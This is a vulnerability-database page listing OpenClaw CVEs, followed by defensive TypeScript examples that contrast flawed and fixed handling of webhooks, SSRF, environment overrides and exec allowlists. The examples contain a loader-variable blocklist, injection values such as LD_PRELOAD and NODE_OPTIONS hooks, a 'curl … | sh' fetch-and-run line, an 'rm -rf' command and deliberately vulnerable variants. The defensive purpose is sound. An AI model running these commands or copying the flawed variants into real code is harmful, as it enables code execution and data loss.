VYPR

Openclaw

by OpenClaw

npm: openclaw

Source repositories

CVEs (537)

  • CVE-2026-41399  High  Apr 28, 2026
    risk 0.42  cvss 7.5  epss 0.00

    OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for legitimate clients.

  • CVE-2026-41395  High  Apr 28, 2026
    risk 0.42  cvss 7.5  epss 0.00

    OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay cache detection and trigger…

  • CVE-2026-41302  High  Apr 21, 2026
    risk 0.42  cvss 7.6  epss 0.00

    OpenClaw before 2026.3.31 contains a server-side request forgery vulnerability in the marketplace plugin download functionality that allows remote attackers to make arbitrary network requests. Attackers can exploit unguarded fetch() calls to access internal resources or interact…

  • CVE-2026-41297  High  Apr 21, 2026
    risk 0.42  cvss 7.6  epss 0.00

    OpenClaw before 2026.3.31 contains a server-side request forgery vulnerability in the marketplace plugin download functionality that allows attackers to access internal resources by following unvalidated redirects. The marketplace.ts module fails to restrict redirect…

  • CVE-2026-35650  High  Apr 10, 2026
    risk 0.42  cvss 7.5  epss 0.00

    OpenClaw before 2026.3.22 contains an environment variable override handling vulnerability that allows attackers to bypass the shared host environment policy through inconsistent sanitization paths. Attackers can supply blocked or malformed override keys that slip through…

  • CVE-2026-34426  High  Apr 2, 2026
    risk 0.42  cvss 7.6  epss 0.00

    OpenClaw versions prior to commit b57b680 contain an approval bypass vulnerability due to inconsistent environment variable normalization between approval and execution paths, allowing attackers to inject attacker-controlled environment variables into execution without approval…

  • CVE-2026-32988  High  Mar 31, 2026
    risk 0.42  cvss 7.5  epss 0.00

    OpenClaw before 2026.3.11 contains a sandbox boundary bypass vulnerability in fs-bridge staged writes where temporary file creation and population are not pinned to a verified parent directory. Attackers can exploit a race condition in parent-path alias changes to write…

  • CVE-2026-32982  High  Mar 31, 2026
    risk 0.42  cvss 7.5  epss 0.00

    OpenClaw before 2026.3.13 contains an information disclosure vulnerability in the fetchRemoteMedia function that exposes Telegram bot tokens in error messages. When media downloads fail, the original Telegram file URLs containing bot tokens are embedded in MediaFetchError…

  • CVE-2026-32980  High  Mar 29, 2026
    risk 0.42  cvss 7.5  epss 0.01

    OpenClaw before 2026.3.13 reads and buffers Telegram webhook request bodies before validating the x-telegram-bot-api-secret-token header, allowing unauthenticated attackers to exhaust server resources. Attackers can send POST requests to the webhook endpoint to force memory…

  • CVE-2026-32846  High  Mar 26, 2026
    risk 0.42  cvss 7.5  epss 0.01

    OpenClaw before 2026.3.28 contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. Attackers can exploit incomplete validation and the…

  • CVE-2026-32062  High  Mar 11, 2026
    risk 0.42  cvss 7.5  epss 0.00

    OpenClaw versions 2026.2.21-2 up to, but not including, 2026.2.22, and @openclaw/voice-call versions 2026.2.21 up to, but not including, 2026.2.22 accept media-stream WebSocket upgrades before stream validation, allowing unauthenticated clients to establish connections. Remote…

  • CVE-2026-3690  High  Apr 11, 2026
    risk 0.41  cvss 7.4  epss 0.01

    OpenClaw Canvas Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of OpenClaw. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of…

  • CVE-2026-35629  High  Apr 9, 2026
    risk 0.41  cvss 7.4  epss 0.00

    OpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to…

  • CVE-2026-32019  High  Mar 19, 2026
    risk 0.41  cvss 7.4  epss 0.00

    OpenClaw versions prior to 2026.2.22 contain incomplete IPv4 special-use range validation in the isPrivateIpv4() function, allowing requests to RFC-reserved ranges to bypass SSRF policy checks. Attackers with network reachability to special-use IPv4 ranges can exploit web_fetch…

  • CVE-2026-53816  High  Jun 11, 2026
    risk 0.40  cvss 7.2  epss 0.00

    OpenClaw before 2026.5.18 contains an insufficient provenance validation vulnerability in node event handling that allows paired nodes to forge exec lifecycle events without system.run authorization. A malicious or compromised paired node can send crafted node.event messages to…

  • CVE-2026-8305  High  May 11, 2026
    risk 0.40  cvss 7.3  epss 0.01

    A vulnerability was detected in OpenClaw up to 2026.1.24. The impacted element is the function handleBlueBubblesWebhookRequest of the file extensions/bluebubbles/src/monitor.ts of the component bluebubbles Webhook. Performing a manipulation results in improper authentication. It…

  • CVE-2026-44995  High  May 11, 2026
    risk 0.40  cvss 7.3  epss 0.00

    OpenClaw before 2026.4.20 contains an improper environment variable validation vulnerability in MCP stdio server configuration that allows attackers to execute arbitrary code. Malicious workspace configurations can pass dangerous startup variables like NODE_OPTIONS, LD_PRELOAD,…

  • CVE-2026-43531  High  May 5, 2026
    risk 0.40  cvss 7.3  epss 0.00

    OpenClaw before 2026.4.9 contains an environment variable injection vulnerability allowing malicious workspace .env files to set runtime-control variables. Attackers can inject variables affecting update sources, gateway URLs, ClawHub resolution, and browser executable paths to…

  • CVE-2026-41390  High  Apr 28, 2026
    risk 0.40  cvss 7.3  epss 0.00

    OpenClaw before 2026.3.28 contains an exec allowlist bypass vulnerability where allow-always persistence fails to unwrap /usr/bin/script and similar wrappers before storing trust decisions. Attackers can obtain user approval for one wrapped command to persist trust for wrapper…

  • CVE-2026-41380  High  Apr 28, 2026
    risk 0.40  cvss 7.3  epss 0.00

    OpenClaw before 2026.3.28 contains an execution approval vulnerability in exec-approvals-allowlist.ts that allows allow-always persistence to trust wrapper carrier executables instead of invoked targets. Attackers can exploit positional carrier executable routing through…
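The replay pattern behind CVE-2026-41395 above (signature computed over a canonicalized query, replay cache keyed on the raw URL), shown as an added example that is not OpenClaw's or Plivo's code. The signing scheme here is a stand-in assumption (HMAC-SHA256 over the canonical URL only; the real Plivo V3 scheme also covers a nonce and body), and the hostnames and secret are constructed. The point it demonstrates is that the replay key must be derived from exactly the bytes the signature covers, otherwise an attacker reorders parameters to get a fresh cache key with the same valid signature.

```typescript
import { createHmac, timingSafeEqual } from "node:crypto";

// Hypothetical signing scheme for the example: HMAC-SHA256 over the canonical URL.
// Query pairs are sorted so ?b=2&a=1 and ?a=1&b=2 produce the same string.
export function canonicalizeUrl(raw: string): string {
  const u = new URL(raw);
  const pairs: [string, string][] = [];
  u.searchParams.forEach((v, k) => pairs.push([k, v]));
  pairs.sort(([ka, va], [kb, vb]) => (ka === kb ? va.localeCompare(vb) : ka.localeCompare(kb)));
  u.search = new URLSearchParams(pairs).toString();
  return u.toString();
}

export function sign(secret: string, url: string): string {
  return createHmac("sha256", secret).update(canonicalizeUrl(url)).digest("base64");
}

function signatureValid(secret: string, url: string, sig: string): boolean {
  const expected = Buffer.from(sign(secret, url));
  const presented = Buffer.from(sig);
  return expected.length === presented.length && timingSafeEqual(expected, presented);
}

export type Verdict = "accepted" | "bad-signature" | "replay";

// One receiver, parameterised by how the replay cache derives its key. The signature
// check is identical in both variants; only the replay key differs.
export class WebhookReceiver {
  private readonly seen = new Set<string>();
  constructor(
    private readonly secret: string,
    private readonly replayKey: (url: string) => string,
  ) {}

  handle(url: string, sig: string): Verdict {
    if (!signatureValid(this.secret, url, sig)) return "bad-signature";
    const key = this.replayKey(url);
    if (this.seen.has(key)) return "replay";
    this.seen.add(key);
    return "accepted";
  }
}

// Flawed: signature is canonical, replay key is the raw URL string as received.
export const rawKeyedReceiver = (secret: string) =>
  new WebhookReceiver(secret, (url) => url);

// Fixed: the replay key is the same canonical form the signature was computed over.
export const canonicalKeyedReceiver = (secret: string) =>
  new WebhookReceiver(secret, canonicalizeUrl);

// Constructed scenario: one signed delivery, then the same delivery with its query
// parameters reordered. Both URLs carry a valid signature because signing is canonical.
export function demo(): { raw: Verdict[]; canonical: Verdict[] } {
  const secret = "example-auth-token"; // constructed, not a real credential
  const original = "https://gateway.example.test/plivo/hook?CallUUID=abc-123&From=15550001&To=15550002";
  const reordered = "https://gateway.example.test/plivo/hook?To=15550002&From=15550001&CallUUID=abc-123";
  const sig = sign(secret, original);

  const raw = rawKeyedReceiver(secret);
  const canonical = canonicalKeyedReceiver(secret);
  return {
    raw: [raw.handle(original, sig), raw.handle(reordered, sig)],
    canonical: [canonical.handle(original, sig), canonical.handle(reordered, sig)],
  };
}
```

A URL-keyed cache is only a partial defence in any case: a scheme that carries a nonce and timestamp should key the replay cache on the nonce and reject deliveries outside the timestamp window, so that two legitimately distinct deliveries to the same URL are not confused with a replay.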
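The ordering flaw in CVE-2026-32980 above (webhook body buffered before the x-telegram-bot-api-secret-token header is checked), as an added example that is not OpenClaw's code. The handler below authenticates on headers alone, destroys the request without draining it when the secret is wrong, and only then reads the body under a size cap. The cap value, the request shapes and the secret are assumptions for the example; the same loop applies unchanged to an http.IncomingMessage, which is also a Readable.

```typescript
import { timingSafeEqual } from "node:crypto";
import { Readable } from "node:stream";

// Assumed cap for a Telegram update payload; choose it for your deployment.
export const MAX_BODY_BYTES = 64 * 1024;

export type Outcome = "unauthorized" | "too-large" | "ok";
export interface Result { outcome: Outcome; bytesRead: number; update?: unknown }

function secretMatches(presented: string | undefined, expected: string): boolean {
  if (presented === undefined) return false;
  const a = Buffer.from(presented);
  const b = Buffer.from(expected);
  return a.length === b.length && timingSafeEqual(a, b);
}

// Order matters: the header check runs before a single body byte is consumed, so an
// unauthenticated sender cannot make the server buffer anything on its behalf.
export async function handleTelegramWebhook(
  headers: Record<string, string | undefined>,
  body: Readable,
  expectedSecret: string,
): Promise<Result> {
  if (!secretMatches(headers["x-telegram-bot-api-secret-token"], expectedSecret)) {
    body.destroy(); // tear the request down without draining it
    return { outcome: "unauthorized", bytesRead: 0 };
  }
  const chunks: Buffer[] = [];
  let bytesRead = 0;
  for await (const chunk of body) {
    const buf = Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk as string);
    bytesRead += buf.length;
    if (bytesRead > MAX_BODY_BYTES) {
      body.destroy(); // stop reading as soon as the cap is exceeded
      return { outcome: "too-large", bytesRead };
    }
    chunks.push(buf);
  }
  return { outcome: "ok", bytesRead, update: JSON.parse(Buffer.concat(chunks).toString("utf8")) };
}

// Constructed requests: one without the header, one over the cap, one genuine update.
export async function demo(): Promise<Result[]> {
  const secret = "webhook-secret-example"; // constructed
  const spoofed = Readable.from([Buffer.alloc(1024)]);
  const oversized = Readable.from([Buffer.alloc(MAX_BODY_BYTES + 1, 0x20)]);
  const genuine = Readable.from([Buffer.from('{"update_id":1,"message":{"text":"hi"}}')]);
  return [
    await handleTelegramWebhook({}, spoofed, secret),
    await handleTelegramWebhook({ "x-telegram-bot-api-secret-token": secret }, oversized, secret),
    await handleTelegramWebhook({ "x-telegram-bot-api-secret-token": secret }, genuine, secret),
  ];
}
```

In a real server the Content-Length header, when present, can be compared against the cap before reading as well, but the streaming check is what protects against chunked or misreported bodies.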
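One guarded-fetch shape that addresses the four SSRF entries above together (CVE-2026-41302 and CVE-2026-41297: unguarded fetch() and unvalidated redirects in marketplace downloads; CVE-2026-35629: unguarded configured base URLs; CVE-2026-32019: incomplete special-use IPv4 coverage in isPrivateIpv4()), as an added example that is not OpenClaw's code. The range table is an assumed policy drawn from the RFC 6890 registry, the resolver and transport are injected so the example runs offline, and the DNS answers and HTTP responses are constructed; 198.0.0.x is used only as a public-looking stand-in. It goes slightly beyond the entries by rejecting mixed DNS answer sets, the usual rebinding vector.

```typescript
import { isIPv4 } from "node:net";

// Special-use IPv4 ranges (RFC 6890 registry entries plus multicast and reserved space).
// Assumed policy for this example; review it against the registry rather than copy it.
const SPECIAL_USE_V4: ReadonlyArray<readonly [string, number]> = [
  ["0.0.0.0", 8],       // "this" network
  ["10.0.0.0", 8],      // private
  ["100.64.0.0", 10],   // shared address space (CGNAT)
  ["127.0.0.0", 8],     // loopback
  ["169.254.0.0", 16],  // link-local, includes cloud metadata 169.254.169.254
  ["172.16.0.0", 12],   // private
  ["192.0.0.0", 24],    // IETF protocol assignments
  ["192.0.2.0", 24],    // TEST-NET-1
  ["192.88.99.0", 24],  // 6to4 relay anycast (deprecated)
  ["192.168.0.0", 16],  // private
  ["198.18.0.0", 15],   // benchmarking
  ["198.51.100.0", 24], // TEST-NET-2
  ["203.0.113.0", 24],  // TEST-NET-3
  ["224.0.0.0", 4],     // multicast
  ["240.0.0.0", 4],     // reserved, includes 255.255.255.255
];

function v4ToInt(ip: string): number {
  return ip.split(".").reduce((acc, octet) => ((acc << 8) + Number(octet)) >>> 0, 0);
}

export function isSpecialUseIpv4(ip: string): boolean {
  if (!isIPv4(ip)) return false;
  const n = v4ToInt(ip);
  return SPECIAL_USE_V4.some(([base, prefix]) => {
    const mask = (0xffffffff << (32 - prefix)) >>> 0;
    return ((n & mask) >>> 0) === ((v4ToInt(base) & mask) >>> 0);
  });
}

export type Resolver = (host: string) => Promise<string[]>;
export type Transport = (url: string) => Promise<{ status: number; location?: string }>;

// Policy applied to every URL the client is about to contact, not just the first one.
export async function assertAllowedTarget(url: URL, resolve: Resolver): Promise<void> {
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    throw new Error(`blocked scheme ${url.protocol}`);
  }
  const host = url.hostname;
  const addrs = isIPv4(host) ? [host] : await resolve(host);
  if (addrs.length === 0) throw new Error(`unresolvable host ${host}`);
  for (const a of addrs) {
    // Every answer must pass; a mixed answer set is a rebinding attempt or a misconfiguration.
    // IPv6 is out of scope for this example and is refused rather than silently allowed.
    if (!isIPv4(a) || isSpecialUseIpv4(a)) throw new Error(`blocked address ${a} for ${host}`);
  }
}

// Follows redirects by hand so the policy runs on each hop. With the real fetch() this is
// fetch(url, { redirect: "manual" }) plus reading the Location header yourself.
export async function guardedFetch(
  start: string, resolve: Resolver, request: Transport, maxHops = 5,
): Promise<string> {
  let current = new URL(start);
  for (let hop = 0; hop <= maxHops; hop++) {
    await assertAllowedTarget(current, resolve);
    const res = await request(current.toString());
    if (res.status >= 300 && res.status < 400 && res.location !== undefined) {
      current = new URL(res.location, current); // Location may be relative
      continue;
    }
    return current.toString(); // the URL that was actually fetched
  }
  throw new Error("too many redirects");
}

export async function demo(): Promise<string[]> {
  // Constructed DNS answers and HTTP responses; no network is used.
  const dns: Record<string, string[]> = {
    "plugins.example.test": ["198.0.0.1"],
    "cdn.example.test": ["198.0.0.2"],
    "rebind.example.test": ["198.0.0.3", "10.0.0.5"],
  };
  const responses: Record<string, { status: number; location?: string }> = {
    "https://plugins.example.test/pkg.tgz": { status: 302, location: "http://169.254.169.254/latest/meta-data/" },
    "https://plugins.example.test/ok.tgz": { status: 302, location: "/mirror/ok.tgz" },
    "https://plugins.example.test/mirror/ok.tgz": { status: 301, location: "https://cdn.example.test/ok.tgz" },
    "https://cdn.example.test/ok.tgz": { status: 200 },
  };
  const resolve: Resolver = async (host) => dns[host] ?? [];
  const request: Transport = async (url) => responses[url] ?? { status: 404 };
  const out: string[] = [];
  for (const s of [
    "https://plugins.example.test/pkg.tgz",
    "https://plugins.example.test/ok.tgz",
    "https://rebind.example.test/x",
    "http://192.0.0.9/",
  ]) {
    try {
      out.push(`ok:${await guardedFetch(s, resolve, request)}`);
    } catch (err) {
      out.push(`blocked:${(err as Error).message}`);
    }
  }
  return out;
}
```

The check-then-connect gap remains: if the transport resolves the name again, a rebinding server can answer differently the second time. Pin the connection to the vetted address (a custom lookup on the HTTP agent, or connecting by IP with the Host header set) so the policy decision and the socket use the same answer.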
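The environment-override entries above share one root cause: CVE-2026-35650 and CVE-2026-34426 describe approval and execution paths that normalize keys differently, and CVE-2026-44995 and CVE-2026-43531 describe startup-control variables (NODE_OPTIONS, LD_PRELOAD and the like) that a workspace should never be able to set. The following is an added example, not OpenClaw's code, of one validation routine shared by both paths plus an approval record that the exec path verifies against. The blocklist, the key grammar and the override set are assumptions; any variable the runtime itself reads for update sources, gateway URLs or executable paths belongs on such a list too.

```typescript
import { createHash } from "node:crypto";

// Keys a workspace or plugin must never set on a child process. Assumed list for the
// example (loader and interpreter startup controls); OpenClaw's own policy may differ.
const BLOCKED_KEYS = new Set([
  "NODE_OPTIONS", "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT",
  "DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH", "PATH", "PYTHONPATH", "PERL5OPT",
]);
const BLOCKED_PREFIXES = ["LD_", "DYLD_"];
// Portable environment names only: no whitespace, no '=', no control characters.
const KEY_SHAPE = /^[A-Za-z_][A-Za-z0-9_]*$/;

export type Decision = { ok: true; key: string } | { ok: false; reason: string };

// The single validation routine. The approval prompt and the exec path both call this
// and nothing else, so a key cannot be judged one way at approval time and another at run time.
export function checkEnvOverride(rawKey: string, value: string): Decision {
  if (!KEY_SHAPE.test(rawKey)) return { ok: false, reason: `malformed key ${JSON.stringify(rawKey)}` };
  if (value.includes("\0")) return { ok: false, reason: `NUL byte in value of ${rawKey}` };
  // Case-insensitive comparison: fail closed on platforms whose environment is case-insensitive.
  const upper = rawKey.toUpperCase();
  if (BLOCKED_KEYS.has(upper) || BLOCKED_PREFIXES.some((p) => upper.startsWith(p))) {
    return { ok: false, reason: `${rawKey} controls process startup` };
  }
  return { ok: true, key: rawKey };
}

export function filterEnv(requested: Record<string, string>): { env: Record<string, string>; rejected: string[] } {
  const env: Record<string, string> = {};
  const rejected: string[] = [];
  for (const [k, v] of Object.entries(requested)) {
    const d = checkEnvOverride(k, v);
    if (d.ok) env[d.key] = v;
    else rejected.push(d.reason);
  }
  return { env, rejected };
}

// Fingerprint of exactly the pairs that will be applied, bound into the approval record.
export function envFingerprint(env: Record<string, string>): string {
  const h = createHash("sha256");
  for (const k of Object.keys(env).sort()) h.update(`${k}=${env[k]}\0`);
  return h.digest("hex");
}

export interface Approval { argv: string[]; env: Record<string, string>; fingerprint: string }

export function approve(argv: string[], requested: Record<string, string>): Approval {
  const { env } = filterEnv(requested);
  return { argv, env, fingerprint: envFingerprint(env) };
}

// Exec path: recompute with the same function and refuse if the result is not what the
// user was shown. Returns the environment to pass to the child process.
export function envForExec(approval: Approval, requested: Record<string, string>): Record<string, string> {
  const { env } = filterEnv(requested);
  if (envFingerprint(env) !== approval.fingerprint) {
    throw new Error("environment differs from the approved one; re-approval required");
  }
  return env;
}

export function demo(): { approvedEnv: Record<string, string>; rejected: string[]; tamperDetected: boolean } {
  // Constructed override set covering the kinds of keys the advisories describe.
  const requested: Record<string, string> = {
    NODE_OPTIONS: "--require /tmp/hook.js",
    LD_PRELOAD: "/tmp/hook.so",
    "NODE_OPTIONS ": "--require /tmp/hook.js", // trailing space: malformed, must not slip through
    "FOO=bar": "x",                             // '=' inside the key: malformed
    APP_MODE: "dev",
  };
  const approval = approve(["/usr/bin/node", "tool.js"], requested);
  let tamperDetected = false;
  try {
    // Something swaps the override set between approval and execution.
    envForExec(approval, { ...requested, APP_MODE: "prod" });
  } catch {
    tamperDetected = true;
  }
  return { approvedEnv: approval.env, rejected: filterEnv(requested).rejected, tamperDetected };
}
```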
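The allow-always persistence problem in CVE-2026-41390 and CVE-2026-41380 above (trust stored for the wrapper such as /usr/bin/script rather than for the program it runs), as an added example that is not OpenClaw's exec-approvals code. The wrapper table and the approval store are assumptions for the example, and the commands are constructed. The rule it demonstrates: derive the trust key from the unwrapped target, and when the target cannot be determined statically (a shell string inside script -c or sh -c), refuse to persist the decision at all rather than persist it for the carrier.

```typescript
// Which program an argv actually runs once transparent carrier executables are peeled
// off. Returns null when the target cannot be determined statically.
// The wrapper table is an assumption of this example, not OpenClaw's allowlist logic.
function programName(p: string): string {
  return p.split("/").pop() ?? p;
}

export function unwrapCommand(argv: string[]): string[] | null {
  let cur = argv;
  for (let depth = 0; depth < 8; depth++) {
    if (cur.length === 0) return null;
    switch (programName(cur[0])) {
      case "env": {
        // env [-i] [-u NAME] [NAME=value]... COMMAND [ARG]...
        let i = 1;
        while (i < cur.length) {
          const a = cur[i];
          if (a === "-i" || a === "--ignore-environment") { i += 1; continue; }
          if (a === "-u" || a === "--unset") { i += 2; continue; }
          if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(a)) { i += 1; continue; }
          if (a.startsWith("-")) return null; // unrecognised env option: do not guess
          break;
        }
        cur = cur.slice(i);
        continue;
      }
      case "nohup":
        cur = cur.slice(1);
        continue;
      case "nice": {
        // nice [-n N | -N] COMMAND
        const skip = cur[1] === "-n" ? 3 : cur[1]?.startsWith("-") ? 2 : 1;
        cur = cur.slice(skip);
        continue;
      }
      case "timeout": {
        // timeout DURATION COMMAND (plain form only; with options the target is ambiguous)
        if (cur.length >= 3 && !cur[1].startsWith("-")) { cur = cur.slice(2); continue; }
        return null;
      }
      case "script":
      case "sh": case "bash": case "dash": case "zsh":
        // The real program lives inside a string a shell will parse later: opaque.
        return null;
      default:
        return cur;
    }
  }
  return null; // wrapper nesting too deep to reason about
}

// Allow-always store keyed by a function of argv. Trust is keyed on the exact program
// string the user saw (path included), not its basename, so ./ls cannot ride on /bin/ls.
export class AllowAlways {
  private readonly trusted = new Set<string>();
  constructor(private readonly keyOf: (argv: string[]) => string | null) {}

  // Returns false when the decision cannot be persisted safely.
  remember(argv: string[]): boolean {
    const key = this.keyOf(argv);
    if (key === null) return false;
    this.trusted.add(key);
    return true;
  }

  isTrusted(argv: string[]): boolean {
    const key = this.keyOf(argv);
    return key !== null && this.trusted.has(key);
  }
}

// Flawed: keyed on the carrier executable exactly as typed.
export const carrierKeyed = () => new AllowAlways((argv) => argv[0] ?? null);
// Fixed: keyed on the unwrapped target; opaque wrappers are never persisted.
export const targetKeyed = () => new AllowAlways((argv) => unwrapCommand(argv)?.[0] ?? null);

export function demo() {
  const flawed = carrierKeyed();
  const fixed = targetKeyed();
  // The user reads and approves these two with "always". Constructed commands.
  const approvedEnvLs = ["/usr/bin/env", "LC_ALL=C", "ls", "-la"];
  const approvedScriptLs = ["/usr/bin/script", "-q", "-c", "ls -la", "/dev/null"];
  // Later requests that reuse the same carriers.
  const laterEnvRm = ["/usr/bin/env", "rm", "-rf", "/srv/data"];
  const laterEnvLs = ["/usr/bin/env", "LC_ALL=POSIX", "ls"];
  const laterScriptOther = ["/usr/bin/script", "-q", "-c", "curl http://x.test/p | sh", "/dev/null"];

  flawed.remember(approvedEnvLs);
  flawed.remember(approvedScriptLs);
  const fixedPersistedEnv = fixed.remember(approvedEnvLs);
  const fixedPersistedScript = fixed.remember(approvedScriptLs);

  return {
    flawedTrustsEnvRm: flawed.isTrusted(laterEnvRm),             // the hole: any command via env
    flawedTrustsScriptOther: flawed.isTrusted(laterScriptOther), // the hole: any command via script
    fixedPersistedEnv,                                           // persisted, keyed on "ls"
    fixedTrustsEnvLs: fixed.isTrusted(laterEnvLs),
    fixedTrustsEnvRm: fixed.isTrusted(laterEnvRm),
    fixedPersistedScript,                                        // refused: opaque wrapper
    fixedTrustsScriptOther: fixed.isTrusted(laterScriptOther),
  };
}
```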

Page 7 of 27